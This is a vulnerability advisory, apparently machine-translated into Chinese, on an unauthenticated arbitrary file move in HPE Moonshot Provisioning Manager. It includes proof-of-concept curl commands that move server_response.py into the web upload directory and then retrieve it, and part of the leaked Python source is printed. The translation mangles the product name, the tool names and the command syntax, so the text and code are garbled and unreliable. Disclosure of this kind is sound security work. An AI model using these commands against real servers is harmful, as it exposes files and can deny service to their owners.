(R2) HPE月球探测器Provisioning Manager任意文件移动

站得住脚的发现新的漏洞HPE月球探测器Provisioning Manager (MPM)而开发Nessus插件检测HPESBHF03803。未经过身份验证的远程攻击者可以使用web界面任意文件移动到HPE MPM上传目录:/ opt / hp /月球探测器/上传。未经身份验证的攻击者可以检索文件https://[目标]/上传。

服务器使用正常mv移动文件时语义。因此,这个漏洞也可以拒绝服务攻击。然而,MPM web服务器运行的用户月球探测器:月球探测器所以损坏的范围主要限于web服务器文件。

以下旋度命令移动文件server_response.py上传目录my_file:

user@host curl kd美元”isofile.savepath = / opt / hp /月球探测器/小叮当/目录/ server_response.py&isofile。文件名= myfile“https://[目标]/目录/ khuploadfile。身体cgi < html > < > < p >文件上传成功< p > < /身体> < / html > < / pre >

攻击者可以获取文件旋度命令:

curl - k美元[user@host] https://[目标]/上传/ myfile # !/usr/bin/python导入cgi导入操作系统。路径进口cgitb cgitb.enable () debug = False如果os.path.exists (“/ tmp / khupload”): debug = True输出信号= (“/ tmp / server_response开放。日志”、“w”)……截断……